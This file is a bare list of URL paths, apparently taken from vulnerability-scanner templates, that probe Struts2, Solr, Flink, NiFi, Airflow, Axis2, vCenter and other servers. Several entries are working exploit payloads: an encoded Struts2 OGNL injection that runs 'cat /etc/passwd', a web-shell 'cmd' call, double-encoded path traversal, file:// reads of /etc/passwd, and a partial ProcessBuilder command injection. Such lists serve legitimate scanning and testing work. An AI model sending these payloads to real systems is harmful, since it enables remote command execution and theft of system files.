/nifi-api/process-groups/root
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/struts2-rest-showcase/orders/3
/orders/3
/jkstatus
/jkstatus;
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/meta
/v2/api/product/manger/getInfo
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/index.jsp
/doAs?=`{{url_encode(
/sm/login/loginpagecontentgrabber.do?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{
/_config
/api/security/ticket
/axis2-admin/login
/axis2/axis2-admin/login
/solr/debug/dump?stream.url=file:///etc/passwd&param=ContentStream
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/admin/
/graphql
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/?doAs=`{{url_encode(
/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}
/{{randstr}}
/docs/introduction.html
/%5C%5C{{interactsh-url}}/apachehttpd
/{{files}}
/{{http_1_files}}%3ftest.php
/html/usr/share/doc/hostname/copyright%3f
/nifi-api/access/config
/html/usr/lib/cgi-bin/download.cgi%3F
/usr/lib/cgi-bin/download.cgi%3F
/html/usr/lib/cgi-bin/login.cgi%3F
/usr/lib/cgi-bin/login.cgi%3F
/html/usr/lib/cgi-bin/test.cgi%3F
/usr/lib/cgi-bin/test.cgi%3F
{{payloads}}
/
/jk_status
/console/auth/login
/unified-console.html
